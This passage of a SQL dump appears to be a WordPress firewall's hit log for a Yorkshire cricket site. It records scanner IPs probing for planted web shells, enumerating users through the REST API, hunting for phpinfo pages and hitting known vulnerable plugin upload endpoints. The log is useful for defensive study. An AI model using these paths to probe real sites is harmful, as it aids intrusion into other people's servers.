.7817,55,'i7a6ZDwkh9b50A3YX4KxBuQo','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin.php'),('185.255.89.45',3120519469,'',0,1673581117.7206,55,'CfZi61LoNghGxpHlqKWDkemP','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/wp-content.php'),('185.255.89.45',3120519469,'',0,1673581118.4676,55,'v8VklJ1mc6I7fyUZpD5swuXC','','19|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wp-includes.php'),('185.255.89.45',3120519469,'',0,1673581118.5068,10,'v8VklJ1mc6I7fyUZpD5swuXC','','707|0|0|0|yorkshirecricketboard.org.uk/wp-includes/wp-includes.php'),('185.255.89.45',3120519469,'',0,1673581119.4296,100,'YkvJGmHWEt2czaA9XlxKOIn7','','13|0|0|0|yorkshirecricketboard.org.uk/123.php'),('185.255.89.45',3120519469,'',0,1673581120.1621,55,'QPMaymElpjBRWIb8q34X6itY','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/js/widgets/index.php'),('185.255.89.45',3120519469,'',0,1673581120.9290,55,'mXRc5ApNJtQaOfdL36kviKhC','','19|0|0|0|yorkshirecricketboard.org.uk/nf_tracking.php'),('185.255.89.45',3120519469,'',0,1673581121.7479,55,'dBfDe1xFv8HZT6N3AJPXbq5U','','19|0|0|0|yorkshirecricketboard.org.uk/nin.php'),('185.255.89.45',3120519469,'',0,1673581122.4832,55,'VsI9WfS53ZGcAUEQyCtzH4iL','','19|0|0|0|yorkshirecricketboard.org.uk/wp-admin/css/colors/blue/nin.php'),('185.255.89.45',3120519469,'',0,1673581125.4031,55,'nJ1C9baY23qMKtAQ5DHLIT4o','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-light/wp-light.php'),('185.255.89.45',3120519469,'',0,1673581126.1137,55,'uy3PxG1T4SNJCDmaUtp7RZhs','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/networker/networker.php'),('185.255.89.45',3120519469,'',0,1673581126.9395,55,'L8TC6UZJmDvuRXWhpdjGcF2K','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/twentythree/inc/index.php'),('185.255.89.45',3120519469,'',0,1673581127.7603,55,'bCA48EJe6Xt0Z9P3SWpMQG5w','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php'),('185.165.116.21',3114628117,'',0,1673637635.7393,70,'oZvQ4OAVp7MxdeXl0WwFhs9q','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/'),('178.17.171.102',2987502438,'',0,1673639064.5798,70,'0B4MpxmXrckIsWEjnP6eUaoi','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/1'),('104.244.73.136',1760840072,'',0,1673639066.3156,70,'npYtZ1d52WO0T3sQjmkBMiql','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/2'),('23.128.248.30',394328094,'',0,1673639068.0709,70,'v7LrEMjYlyCPh183XI2WD0cq','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/3'),('109.70.100.88',1833329752,'',0,1673639069.5492,70,'cvPwoG5kygEqpKnztObe6Iij','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/4'),('185.220.101.13',3118228749,'',0,1673639070.8810,70,'cC6mvbl5w4TMxojLhAGae1uf','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/5'),('125.65.229.214',2101470678,'',0,1673659210.8697,55,'ZJ2YgA93TC5bcqrXOhV8zja6','','19|0|0|0|yorkshirecricketboard.org.uk/m/admin.php'),('125.65.228.55',2101470263,'',0,1673659210.8697,55,'r0CHWdtsbgmxhVF9cilN78zn','','19|0|0|0|yorkshirecricketboard.org.uk/m/nginx.php'),('182.145.92.217',3062979801,'',0,1673659210.8697,55,'VMR7EtPg0315UQjWnrevbIqi','','19|0|0|0|yorkshirecricketboard.org.uk/m/demodata.php'),('171.217.250.241',2883189489,'',0,1673659210.8697,55,'W9uztY5H0FwVcQR4dLCoBOxf','','19|0|0|0|yorkshirecricketboard.org.uk/data/x.php'),('182.145.92.217',3062979801,'',0,1673659210.8697,55,'SVEaNY0gkbJisHGPClKhuRdL','','19|0|0|0|yorkshirecricketboard.org.uk/m/1.php'),('171.217.251.47',2883189551,'',0,1673659210.8697,55,'LSxZ8Hs3ncT1IfzN2m4kBgW6','','19|0|0|0|yorkshirecricketboard.org.uk/m/newfile.php'),('110.190.179.76',1857991500,'',0,1673659210.8697,55,'GrTebAQh8aVxHP3gUwkzB6Yv','','19|0|0|0|yorkshirecricketboard.org.uk/m/a.php'),('110.190.179.76',1857991500,'',0,1673659210.8697,55,'0IHDuoh8wCWvBfJ6iOk4LZmb','','19|0|0|0|yorkshirecricketboard.org.uk/m/admins.php'),('110.190.179.213',1857991637,'',0,1673659210.8697,55,'DzLVnXCFUKHuJwljhPxyeTmG','','19|0|0|0|yorkshirecricketboard.org.uk/m/apache.php'),('171.217.250.162',2883189410,'',0,1673659210.8733,55,'mThDCfxY0jp9NyP6zZuaHBdI','','19|0|0|0|yorkshirecricketboard.org.uk/data/wdf.php'),('182.135.116.215',3062330583,'',0,1673659211.3449,55,'sxRqjEMOry4BU8LZvmn3JADS','','19|0|0|0|yorkshirecricketboard.org.uk/m/1234.php'),('110.190.176.70',1857990726,'',0,1673659211.7408,55,'xtcMdG47098pZwQNlmH3P2nf','','19|0|0|0|yorkshirecricketboard.org.uk/m/x.php'),('182.135.116.59',3062330427,'',0,1673659211.7417,55,'i67e1vSyI9NF3uHXlBqckJ24','','19|0|0|0|yorkshirecricketboard.org.uk/templets/wdf.php'),('125.65.228.147',2101470355,'',0,1673659211.7417,55,'0LY8hDtIVn2QvKwpPCilJXf9','','19|0|0|0|yorkshirecricketboard.org.uk/templets/admin.php'),('182.135.116.151',3062330519,'',0,1673659212.0252,55,'G6aTeDMwtbA2ikxF7Y9Wq1LI','','19|0|0|0|yorkshirecricketboard.org.uk/templets/1.php'),('110.190.179.213',1857991637,'',0,1673659212.0894,55,'4VONLbGy6xXrdHzo9nATgR2u','','19|0|0|0|yorkshirecricketboard.org.uk/install/a.php'),('110.190.179.76',1857991500,'',0,1673659212.2533,55,'KAPfEmrw9XVqhUseRDGyQ5cZ','','19|0|0|0|yorkshirecricketboard.org.uk/templets/nginx.php'),('171.217.251.94',2883189598,'',0,1673659212.2929,55,'uLFTicG1jrwkxnlCyVm3tJPB','','19|0|0|0|yorkshirecricketboard.org.uk/templets/newfile.php'),('182.145.92.217',3062979801,'',0,1673659212.3525,55,'sHhjoIytD1iQ4YR9ncSeZE87','','19|0|0|0|yorkshirecricketboard.org.uk/templets/a.php'),('125.65.228.147',2101470355,'',0,1673659212.3560,55,'Ig4y8xGdXU6tiDVhQLSnc3vj','','19|0|0|0|yorkshirecricketboard.org.uk/templets/admins.php'),('182.135.116.217',3062330585,'',0,1673659212.3633,55,'9eSVUXFk7GTQIfnpzbY2W8Ag','','19|0|0|0|yorkshirecricketboard.org.uk/templets/1234.php'),('125.65.229.18',2101470482,'',0,1673659212.3674,55,'rDFZXxNg63paVnj4sEMbhBiy','','19|0|0|0|yorkshirecricketboard.org.uk/templets/apache.php'),('182.135.116.8',3062330376,'',0,1673659212.3766,55,'0sqgWi38U4cuDjVAwmHlYoLN','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/wdf.php'),('171.217.251.239',2883189743,'',0,1673659212.6356,55,'VuMxiev2gHPJsIXOhUEqzc5W','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/1.php'),('182.135.116.114',3062330482,'',0,1673659212.7368,55,'0MhZaPYVtFpkgKQBD5z1yXsc','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/demodata.php'),('171.217.251.231',2883189735,'',0,1673659212.7522,55,'CnRpqYkvD8wEXjxHUoraeuId','','19|0|0|0|yorkshirecricketboard.org.uk/templets/demodata.php'),('171.217.250.241',2883189489,'',0,1673659213.0796,55,'8ZWbFXou7nMPp0ahBvy9wULE','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/admins.php'),('125.65.228.149',2101470357,'',0,1673659213.1036,55,'fOgxhLKRrFBdmpz1oMWXecvN','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/newfile.php'),('110.190.177.113',1857991025,'',0,1673659213.1247,55,'ZUW2QCPRit7VKAqx6Xv4pSmz','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/nginx.php'),('110.190.176.219',1857990875,'',0,1673659213.5311,55,'0Pv3XUndGqL2scC9MOKxJk5a','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/1234.php'),('171.217.250.40',2883189288,'',0,1673659213.5470,55,'nw5vDSe9Eylq3LOak1F8fBsQ','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/x.php'),('125.65.228.147',2101470355,'',0,1673659213.6391,55,'rD3dG1OHI9olhWZQVR6aktvA','','19|0|0|0|yorkshirecricketboard.org.uk/upload/wdf.php'),('125.65.228.149',2101470357,'',0,1673659213.7184,55,'fPhS5pCt7nN3ZlH9Ew0jdMgB','','19|0|0|0|yorkshirecricketboard.org.uk/upload/nginx.php'),('171.217.251.134',2883189638,'',0,1673659214.4555,55,'bHhMyvpIKJA5VWqxGZ0iszXu','','19|0|0|0|yorkshirecricketboard.org.uk/upload/newfile.php'),('125.65.229.214',2101470678,'',0,1673659214.9453,55,'CWXMtoneHUQB3wkOG1lisrKc','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/apache.php'),('171.217.250.253',2883189501,'',0,1673659215.3152,55,'cUeZWsaOKJu4z93SGb7D8RIQ','','19|0|0|0|yorkshirecricketboard.org.uk/templets/x.php'),('182.145.126.151',3062988439,'',0,1673659216.3746,55,'oI8PN69JUMhkDY32qVK5fibj','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/a.php'),('182.135.116.22',3062330390,'',0,1673659216.6442,55,'zmV4TCMU6x73Bv5iIhXwPfkN','','19|0|0|0|yorkshirecricketboard.org.uk/upload/1.php'),('182.135.116.108',3062330476,'',0,1673659216.9276,55,'lnS2k9cPqyO6fXtEVCzHZmRA','','19|0|0|0|yorkshirecricketboard.org.uk/upload/a.php'),('171.217.251.134',2883189638,'',0,1673659216.9649,55,'8kLNzOKMgRe1BD9YVtjZSh4C','','19|0|0|0|yorkshirecricketboard.org.uk/upload/x.php'),('171.217.251.229',2883189733,'',0,1673659217.2377,55,'8gSwU5Ct4La6EY2Wl37qmTAI','','19|0|0|0|yorkshirecricketboard.org.uk/upload/1234.php'),('125.65.228.9',2101470217,'',0,1673659217.3676,55,'mTzUPZxOjg9lquwYAQ70IF28','','19|0|0|0|yorkshirecricketboard.org.uk/upload/admin.php'),('125.65.228.198',2101470406,'',0,1673659217.5703,55,'8uvBMFNXLGdh5no36VRlmCPA','','19|0|0|0|yorkshirecricketboard.org.uk/template/newfile.php'),('171.217.250.51',2883189299,'',0,1673659217.6726,55,'4hfeuQrlsdcKv378XTzRJkmW','','19|0|0|0|yorkshirecricketboard.org.uk/data/1.php'),('125.65.229.205',2101470669,'',0,1673659217.8276,55,'gEIcmjPWGeNhdJ1524ACbZDO','','19|0|0|0|yorkshirecricketboard.org.uk/admin.php'),('110.190.177.176',1857991088,'',0,1673659217.9027,55,'eO2DIEA6X8NbG3igUYZFa9rV','','19|0|0|0|yorkshirecricketboard.org.uk/install/nginx.php'),('110.190.179.76',1857991500,'',0,1673659217.9344,55,'gbpASyCXen7GQxzUhOm3w96r','','19|0|0|0|yorkshirecricketboard.org.uk/install/demodata.php'),('171.217.250.51',2883189299,'',0,1673659217.9599,55,'Jo6Ofr9WRHMGkUwZjt0uY8EK','','19|0|0|0|yorkshirecricketboard.org.uk/1.php'),('182.135.116.108',3062330476,'',0,1673659218.2191,55,'tEqF0RVdzr6Mh3naWHSGu8Pe','','19|0|0|0|yorkshirecricketboard.org.uk/demodata.php'),('182.135.116.114',3062330482,'',0,1673659218.4857,55,'TCouUZ2Afp1cR54drB7nQqGy','','19|0|0|0|yorkshirecricketboard.org.uk/template/admins.php'),('182.135.116.217',3062330585,'',0,1673659218.5427,55,'dkz9LDIrWhNwFyGqY6QSoOJP','','19|0|0|0|yorkshirecricketboard.org.uk/nginx.php'),('171.217.250.253',2883189501,'',0,1673659218.6392,55,'81EgU5bdaH3TBxCGRlNXpQsO','','19|0|0|0|yorkshirecricketboard.org.uk/a.php'),('110.190.177.134',1857991046,'',0,1673659220.2903,55,'aUFOiKHe8EwxRksrI5cX9y1A','','19|0|0|0|yorkshirecricketboard.org.uk/uploads/admin.php'),('182.135.116.217',3062330585,'',0,1673659220.8850,55,'bIM5Rw2sLt0WqcJdzTCKa8Oe','','19|0|0|0|yorkshirecricketboard.org.uk/admins.php'),('171.217.251.47',2883189551,'',0,1673659221.1625,55,'3GZ6EJ0kXevqbSInNQhsUd9a','','19|0|0|0|yorkshirecricketboard.org.uk/newfile.php'),('125.65.228.235',2101470443,'',0,1673659221.6464,55,'8mcOAS4vZj5GhDsJ1BYPoKLM','','19|0|0|0|yorkshirecricketboard.org.uk/1234.php'),('110.190.176.131',1857990787,'',0,1673659221.9187,55,'gPJRrKFLpBD2NjYIXsTxncE1','','19|0|0|0|yorkshirecricketboard.org.uk/x.php'),('182.135.116.59',3062330427,'',0,1673659222.7051,55,'zUv5O0Yd1ecHFCt9ZaI6KbrS','','19|0|0|0|yorkshirecricketboard.org.uk/upload/demodata.php'),('171.217.250.75',2883189323,'',0,1673659222.7280,55,'kQjVNK1uqo78zSfZwEghUIpB','','19|0|0|0|yorkshirecricketboard.org.uk/upload/admins.php'),('182.145.92.217',3062979801,'',0,1673659223.3178,55,'a0zOScJe6gIGdUqpy7xj1wh8','','19|0|0|0|yorkshirecricketboard.org.uk/template/a.php'),('182.145.126.151',3062988439,'',0,1673659225.8643,55,'YgEIK387LpZTahljvVXndOGu','','19|0|0|0|yorkshirecricketboard.org.uk/template/admin.php'),('182.135.116.22',3062330390,'',0,1673659225.9237,55,'pSN1VWxTkJRFMOBLIGy6s7Kz','','19|0|0|0|yorkshirecricketboard.org.uk/template/wdf.php'),('182.135.116.151',3062330519,'',0,1673659226.2174,55,'Is7WGvx2cn1YUpRKZDf4lw6t','','19|0|0|0|yorkshirecricketboard.org.uk/template/1234.php'),('182.135.116.68',3062330436,'',0,1673659226.2777,55,'E4rv2jTlb9BHuDmwoAe6pGzS','','19|0|0|0|yorkshirecricketboard.org.uk/template/x.php'),('182.145.126.160',3062988448,'',0,1673659226.3000,55,'4oMgXuiyKmdZjf9BkWFTrtC2','','19|0|0|0|yorkshirecricketboard.org.uk/wdf.php'),('125.65.229.214',2101470678,'',0,1673659226.5067,55,'k38LjnIvCw1m9VrMPpguHTsD','','19|0|0|0|yorkshirecricketboard.org.uk/install/admin.php'),('182.135.116.215',3062330583,'',0,1673659226.5848,55,'M7lvA5uXgjp184ybe6TODIHB','','19|0|0|0|yorkshirecricketboard.org.uk/template/nginx.php'),('182.145.126.80',3062988368,'',0,1673659226.6695,55,'vxLtjCWicBbR5lkOdz2r0Zfm','','19|0|0|0|yorkshirecricketboard.org.uk/template/1.php'),('182.135.116.172',3062330540,'',0,1673659226.8240,55,'vIRXct509lr7EPxw2ZuVCpF1','','19|0|0|0|yorkshirecricketboard.org.uk/template/demodata.php'),('125.65.229.205',2101470669,'',0,1673659227.2863,55,'bmTVWH83dX6EUzFAulrxJKnk','','19|0|0|0|yorkshirecricketboard.org.uk/apache.php'),('139.59.183.122',2335946618,'',0,1673690150.0274,55,'Dn9AvJCcaITe8o4xlOZNUWus','','19|0|0|0|yorkshirecricketboard.org.uk/wp-commentin.php'),('5.188.62.21',96222741,'',0,1673699599.8409,70,'HdhCOZcr97qsAG3x1482XiRm','','0|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp/v2/users/'),('172.104.8.119',2892499063,'',0,1673700865.9915,55,'yVmpf14ZrCaX6E9sJIjcMln7','','19|0|0|0|yorkshirecricketboard.org.uk/phpinfo.php'),('172.104.8.119',2892499063,'',0,1673700866.3374,55,'ytWrBKisNI6EqQ1bk7wm2dpa','','19|0|0|0|yorkshirecricketboard.org.uk/info.php'),('172.104.8.119',2892499063,'',0,1673700866.6803,55,'An7sV6Od8vLgrRmY0KESpyBJ','','19|0|0|0|yorkshirecricketboard.org.uk/infophp.php'),('172.104.8.119',2892499063,'',0,1673700867.0412,55,'Y4oLcGpl8BngA1xF7UaPHidj','','19|0|0|0|yorkshirecricketboard.org.uk/php_info.php'),('172.104.8.119',2892499063,'',0,1673700867.5186,55,'yFj6ms0DWxzgvUS4ai79Bcrn','','19|0|0|0|yorkshirecricketboard.org.uk/test.php'),('172.104.8.119',2892499063,'',0,1673700867.7074,10,'yFj6ms0DWxzgvUS4ai79Bcrn','','707|0|0|0|yorkshirecricketboard.org.uk/test.php'),('172.104.8.119',2892499063,'',0,1673700868.3407,55,'es2Sqko8j5cBi47LhMvRYxlr','','19|0|0|0|yorkshirecricketboard.org.uk/i.php'),('172.104.8.119',2892499063,'',0,1673700869.1832,55,'lA3O5KPYb8X9Meigwr27G4qo','','19|0|0|0|yorkshirecricketboard.org.uk/asdf.php'),('172.104.8.119',2892499063,'',0,1673700869.5521,55,'BPWFum7waxVGCM0gDLU19efp','','19|0|0|0|yorkshirecricketboard.org.uk/pinfo.php'),('172.104.8.119',2892499063,'',0,1673700869.8963,55,'YTU0NLSls8VbWreRJdGk2HyM','','19|0|0|0|yorkshirecricketboard.org.uk/phpversion.php'),('172.104.8.119',2892499063,'',0,1673700870.2878,55,'ETF90Oe2rLv165ZVlCbYcJAd','','19|0|0|0|yorkshirecricketboard.org.uk/time.php'),('172.104.8.119',2892499063,'',0,1673700870.6198,50,'kYmgLzUObKCD4E9J3612ixaH','','13|0|0|0|yorkshirecricketboard.org.uk/index.php'),('172.104.8.119',2892499063,'',0,1673700870.9648,55,'7WbVUH5XIe1alpTFOYhxPjwB','','19|0|0|0|yorkshirecricketboard.org.uk/temp.php'),('172.104.8.119',2892499063,'',0,1673700871.2748,55,'VkGhb7u4X9dt1AqZoTYmNaEM','','19|0|0|0|yorkshirecricketboard.org.uk/old_phpinfo.php'),('172.104.8.119',2892499063,'',0,1673700871.5844,55,'PJ9u4Brpte6vAfZOG1iHyITY','','19|0|0|0|yorkshirecricketboard.org.uk/infos.php'),('172.104.8.119',2892499063,'',0,1673700871.8913,55,'ZTO9vlGXc2mdxRVuCWwjyDQa','','19|0|0|0|yorkshirecricketboard.org.uk/linusadmin-phpinfo.php'),('172.104.8.119',2892499063,'',0,1673700872.2022,55,'OMnvN2cD65WE0dtClmQwGkJ8','','19|0|0|0|yorkshirecricketboard.org.uk/php-info.php'),('172.104.8.119',2892499063,'',0,1673700872.5278,55,'2czqhVKMyHbmxa0dwvNgZ6Fs','','19|0|0|0|yorkshirecricketboard.org.uk/dashboard/phpinfo.php'),('172.104.8.119',2892499063,'',0,1673700872.8412,55,'EIZ52xtyJFpdHekcPOqh1wYv','','19|0|0|0|yorkshirecricketboard.org.uk/_profiler/phpinfo.php'),('38.54.112.246',641102070,'',0,1673718218.2495,55,'DPdzbq5e7wxWKpcvC8A2io6n','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/twentytwentytwo/inc/patterns/library.php'),('38.54.112.246',641102070,'',0,1673718219.0805,55,'gOovqTyuZVfFlnCSE8wMp70m','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/themes/twentytwentytwo/inc/patterns/library.php'),('81.88.52.8',1364734984,'admin',0,1673739876.8585,7,'fLg45cXw1mbnFGQP8St0iuBT','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('116.203.33.1',1959469313,'',0,1673744013.6072,55,'WAGEmQueSXUdRLCqBvjbOVZD','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/savepng.php'),('116.203.33.1',1959469313,'',0,1673744025.8863,55,'bdtIw01lpEuKkeTfGvFBHjz3','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744032.1912,55,'BTlF29JnaWhY5jRvPdwU47ZH','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/IOptimizes.php'),('116.203.33.1',1959469313,'',0,1673744066.0545,55,'mdEQcR3DCau8VkMfG12Y9ZlH','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('116.203.33.1',1959469313,'',0,1673744069.3810,55,'bkogry6N8sWaMPh2AJKExzpi','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744069.4205,10,'bkogry6N8sWaMPh2AJKExzpi','','707|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744073.0366,55,'SXUTWAsdmVCvw1HnbRPcxep0','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/wp-engine.php'),('116.203.33.1',1959469313,'',0,1673744074.0513,55,'qntUI9Y7JK8zMjbWEamLoTv1','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744111.5680,55,'HUtg0m9ST2oKFzDVqfOl3L61','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744115.8714,55,'8ZOVrmITQK31UunxsakPJ6RB','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php'),('116.203.33.1',1959469313,'',0,1673744120.4115,55,'nhkI1FHloXzN2DYWPb308EVp','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/apikey/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744187.1045,55,'9qCiAcSRKVnjyzWYah3FXTQo','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php'),('116.203.33.1',1959469313,'',0,1673744241.5588,55,'PqDmyJO4tITuMdZve3fN6HVb','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php'),('116.203.33.1',1959469313,'',0,1673744246.6200,55,'8uOiHM4vyNAaFDzkYlrIjSnR','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php'),('116.203.33.1',1959469313,'',0,1673744269.0772,55,'xADQdkcuO3r9NeVgXLWtEoqh','','19|0|0|0|yorkshirecricketboard.org.uk/abruzi.php4'),('116.203.33.1',1959469313,'',0,1673744273.2462,70,'HE4P0wjb2FgxZe7yOiG8IJkY','','13|0|0|0|yorkshirecricketboard.org.uk/wp-json/wp_live_chat_support/v1/remote_upload'),('116.203.33.1',1959469313,'',0,1673744274.2781,55,'WKVC3jklJxUqyz5ESHLsYMZX','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/uploads/wp_live_chat/abruzi.php'),('116.203.33.1',1959469313,'',0,1673744380.1317,55,'KeTEpX5wGuDg0zok9ca4UVxL','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php'),('116.203.33.1',1959469313,'',0,1673744382.3030,55,'T0f2vyjmaEABkZSoqO7hpFJ3','','19|0|0|0|yorkshirecricketboard.org.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php'),('195.154.184.235',3281697003,'admin',0,1673748774.5406,7,'Wy4g6kEOtR9jpLT5xB7MImld','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('159.223.168.91',2682234971,'admin',0,1673753619.0948,7,'H8lfRZc6S29dbNvTi7wEr04z','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('49.232.145.205',837325261,'admin',0,1673767152.1585,7,'WAtBgQIZLEKTO3sa60CjX8zl','','0|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('167.235.145.36',2817233188,'',0,1673768573.9612,55,'O0doxsEfz7ZKy6YG8FHiXCVv','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/savepng.php'),('167.235.145.36',2817233188,'',0,1673768574.6403,55,'6h01NekZBnTEJVQtMO7Po2ly','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768578.8199,55,'odyzqQDvBPfcxulVXIOH0E4e','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/IOptimizes.php'),('167.235.145.36',2817233188,'',0,1673768582.5596,55,'zDdH2oS3ZA4EPMIrbkyaLFY6','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimizations/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768584.9487,55,'N7K8hDzavxRXM3fJyA2Q9SgL','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('167.235.145.36',2817233188,'',0,1673768584.9967,10,'N7K8hDzavxRXM3fJyA2Q9SgL','','707|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php'),('167.235.145.36',2817233188,'',0,1673768589.0339,55,'sYPcaVK5pC4ywGixvQZq8h2E','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768591.2513,55,'YZT3K9wcmhB0sL5iDO6R1rCd','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/wp-engine.php'),('167.235.145.36',2817233188,'',0,1673768592.5355,55,'Fqg7jWrtowT9ZJBy2fDMN0Ep','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/wp-engine-module/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768596.9600,55,'GeTIOjprtY7JXDbVHnW9dAw8','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768599.6153,55,'vJkcCI4Hb3naF6qOzeWSgpmr','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php'),('167.235.145.36',2817233188,'',0,1673768602.2564,55,'RtTDq9KkYen7EM2aUAN4hvZB','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/apikey/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768605.9173,55,'OqRoJyF10KUmhkICMWbtVHDZ','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'),('167.235.145.36',2817233188,'',0,1673768606.4010,55,'sOkKLiW1xH348yXtdmnMZDGv','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768609.2906,55,'r1ZSK34HNyMgwOiEDFW9QGfv','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768611.1967,55,'PXs8pcr4BIzKuhDEvgxL3JOd','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php'),('167.235.145.36',2817233188,'',0,1673768615.3927,55,'LCc1jkSJAUTsnwzx9ri05OQY','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php'),('167.235.145.36',2817233188,'',0,1673768617.8749,55,'FT39XYf6oHCBJ2tjkilguaxN','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php'),('167.235.145.36',2817233188,'',0,1673768624.3661,55,'tsndUMgkY6HrS3D78jm0Nyz1','','19|0|0|0|www.yorkshirecricketboard.org.uk/abruzi.php4'),('167.235.145.36',2817233188,'',0,1673768626.6143,70,'zWvLaSpGdDlFR8u57r4oQTg0','','13|0|0|0|www.yorkshirecricketboard.org.uk/wp-json/wp_live_chat_support/v1/remote_upload'),('167.235.145.36',2817233188,'',0,1673768630.4351,55,'WhdYFGgPBptvKRxEeSI9y81Q','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/uploads/wp_live_chat/abruzi.php'),('167.235.145.36',2817233188,'',0,1673768634.2595,50,'jo9F5xR6wDed8f4lciTIzypM','','13|0|0|0|yorkshirecricketboard.org.uk/wp-login.php'),('167.235.145.36',2817233188,'',0,1673768640.2150,55,'DGL1uxmbayfqZz4ekYKOcCld','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/uploads/html2wp/abruzi.php'),('167.235.145.36',2817233188,'',0,1673768643.6255,100,'yXeTxDlp1Fan9fkVWm4sUH3Z','','13|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/plugins/wpcargo/includes/barcode.php'),('167.235.145.36',2817233188,'',0,1673768647.8965,100,'grqenfVh2OCKMb0PS3w98zA7','','13|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/x.php'),('167.235.145.36',2817233188,'',0,1673768648.8837,55,'y8YmKDjlgcbLJ3Zorntza2S9','','19|0|0|0|www.yorkshirecricketboard.org.uk/wp-content/king.php'),('167.235.145.36',2817233188,'',0,1673768655